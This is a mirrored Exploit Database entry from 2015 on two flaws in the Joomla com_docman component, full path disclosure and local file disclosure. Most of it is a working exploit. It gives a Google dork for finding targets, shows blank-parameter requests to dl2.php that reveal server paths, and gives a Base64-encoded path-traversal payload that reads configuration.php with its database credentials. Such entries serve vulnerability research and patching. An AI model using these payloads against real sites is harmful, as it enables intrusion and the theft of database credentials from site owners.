Joomla! Component com_docman – Multiple Vulnerabilities

• Exploit Database
• 136 阅读

• 作者： Hugo Santiago
  日期： 2015-07-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37620/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Joomla docman Component &apos;com_docman&apos; Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman # Google Dork: inurl:"/components/com_docman/dl2.php"   # Xploit (FPD): Get one target and just download with blank parameter: http://www.site.com/components/com_docman/dl2.php?archive=0&file= In title will occur Full Path Disclosure of server. # Xploit (LFD/LFI):   http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF] Let&apos;s Xploit... First we need use Xploit FPD to see the path of target, after that we&apos;ll Insert &apos;configuration.php&apos; configuration database file and encode in Base64: ../../../../../../../target/www/configuration.php <= Not Ready http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==<= Ready !   And Now we have a configuration file...